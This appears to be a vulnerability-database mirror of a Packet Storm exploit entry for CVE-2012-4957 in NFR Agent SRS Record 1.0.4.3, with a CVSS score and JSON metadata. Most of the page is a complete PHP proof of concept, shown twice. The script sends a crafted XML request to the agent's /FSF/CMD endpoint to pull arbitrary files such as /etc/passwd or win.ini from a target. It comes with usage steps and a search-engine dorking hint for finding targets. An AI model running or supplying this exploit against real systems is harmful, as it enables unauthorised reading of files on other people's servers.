📄 NFR Agent SRS Record 1.0.4.3 PHP Code Injection

7.8 / 10

HIGH

AV:N/AC:L/Au:N/C:C/I:N/A:N

Description

Proof of concept code injection exploit for NFR Agent SRS Record version 1.0.4.3. This is for an older finding from 2012...

Visit Original Source

Basic Information

ID PACKETSTORM:215625

Published Feb 16, 2026 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : NFR Agent SRS Record 1.0.4.3 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://documentation.n-able.com/remote-management/userguide/Content/agentreleasenotes.htm |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description: This code is written in PHP and aims to exploit a vulnerability in the NFR Agent to retrieve any file from the targeted server.

( https://packetstorm.news/files/id/181031/ CVE-2012-4957 )

[+] save code as poc.php.

[+] Set Target : line 49

[+] USage : php poc.php

[+] PayLoad :

<?php

class NFRFileRetriever {
private $host;
private $port;
private $ssl;
private $remoteFile;

public function __construct($host, $port = 3037, $ssl = true, $remoteFile = null) {
$this->host = $host;
$this->port = $port;
$this->ssl = $ssl;
$this->remoteFile = $remoteFile ?: (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN' ? 'C:\\Windows\\win.ini' : '/etc/passwd');
}

private function generateMessage() {
$record = "<RECORD><NAME>SRS</NAME><OPERATION>4</OPERATION><CMD>103</CMD><PATH>" . $this->remoteFile . "</PATH></RECORD>";
$md5 = strtoupper(md5("SRS" . $record . "SERVER"));
return $md5 . $record;
}

public function retrieveFile() {
$url = ($this->ssl ? "https" : "http") . "://" . $this->host . ":" . $this->port . "/FSF/CMD";

$message = $this->generateMessage();

$options = [
'http' => [
'header' => "Content-Type: text/xml\r\n",
'method' => 'POST',
'content' => $message
]
];

$context = stream_context_create($options);
$response = file_get_contents($url, false, $context);

if ($response && strpos($response, "<RESULT>") === false) {
$fileName = basename($this->remoteFile);
file_put_contents($fileName, $response);
echo "[+] " . $this->remoteFile . " saved as " . $fileName . "\n";
} else {
echo "[-] Failed to retrieve the file contents\n";
}
}
}

// مثال للاستخدام:
$retriever = new NFRFileRetriever('target_ip');
$retriever->retrieveFile();

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2026-02-16T17:15:49",
    "description": "Proof of concept code injection exploit for NFR Agent SRS Record version 1.0.4.3. This is for an older finding from 2012...",
    "published": "2026-02-16T00:00:00",
    "modified": "2026-02-16T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 NFR Agent SRS Record 1.0.4.3 PHP Code Injection",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:215625",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2012-4957"
    ],
    "sourceData": "=============================================================================================================================================\n    | # Title     : NFR Agent SRS Record 1.0.4.3 PHP Code Injection Vulnerability                                                               |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |\n    | # Vendor    : https://documentation.n-able.com/remote-management/userguide/Content/agentreleasenotes.htm                                  |\n    =============================================================================================================================================\n    \n    POC :\n    \n    [+] Dorking \u0130n Google Or Other Search Enggine.\n    \n    [+] Code Description: This code is written in PHP and aims to exploit a vulnerability in the NFR Agent to retrieve any file from the targeted server.\n    \t\n    \t( https://packetstorm.news/files/id/181031/\tCVE-2012-4957 )\n    \t\n    [+] save code as poc.php.\n    \n    [+] Set Target : line 49\n    \n    [+] USage : php poc.php \n    \n    [+] PayLoad :\n    \n    <?php\n    \n    class NFRFileRetriever {\n        private $host;\n        private $port;\n        private $ssl;\n        private $remoteFile;\n    \n        public function __construct($host, $port = 3037, $ssl = true, $remoteFile = null) {\n            $this->host = $host;\n            $this->port = $port;\n            $this->ssl = $ssl;\n            $this->remoteFile = $remoteFile ?: (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN' ? 'C:\\\\Windows\\\\win.ini' : '/etc/passwd');\n        }\n    \n        private function generateMessage() {\n            $record = \"<RECORD><NAME>SRS</NAME><OPERATION>4</OPERATION><CMD>103</CMD><PATH>\" . $this->remoteFile . \"</PATH></RECORD>\";\n            $md5 = strtoupper(md5(\"SRS\" . $record . \"SERVER\"));\n            return $md5 . $record;\n        }\n    \n        public function retrieveFile() {\n            $url = ($this->ssl ? \"https\" : \"http\") . \"://\" . $this->host . \":\" . $this->port . \"/FSF/CMD\";\n            \n            $message = $this->generateMessage();\n    \n            $options = [\n                'http' => [\n                    'header'  => \"Content-Type: text/xml\\r\\n\",\n                    'method'  => 'POST',\n                    'content' => $message\n                ]\n            ];\n            \n            $context = stream_context_create($options);\n            $response = file_get_contents($url, false, $context);\n            \n            if ($response && strpos($response, \"<RESULT>\") === false) {\n                $fileName = basename($this->remoteFile);\n                file_put_contents($fileName, $response);\n                echo \"[+] \" . $this->remoteFile . \" saved as \" . $fileName . \"\\n\";\n            } else {\n                echo \"[-] Failed to retrieve the file contents\\n\";\n            }\n        }\n    }\n    \n    // \u0645\u062b\u0627\u0644 \u0644\u0644\u0627\u0633\u062a\u062e\u062f\u0627\u0645:\n    $retriever = new NFRFileRetriever('target_ip');\n    $retriever->retrieveFile();\n    \n    \n    Greetings to :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/215625",
    "cvss": {
        "score": 7.8,
        "severity": "HIGH",
        "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
        "version": "2.0"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/215625/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

📄 NFR Agent SRS Record 1.0.4.3 PHP Code Injection_PACKETSTORM:215625

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply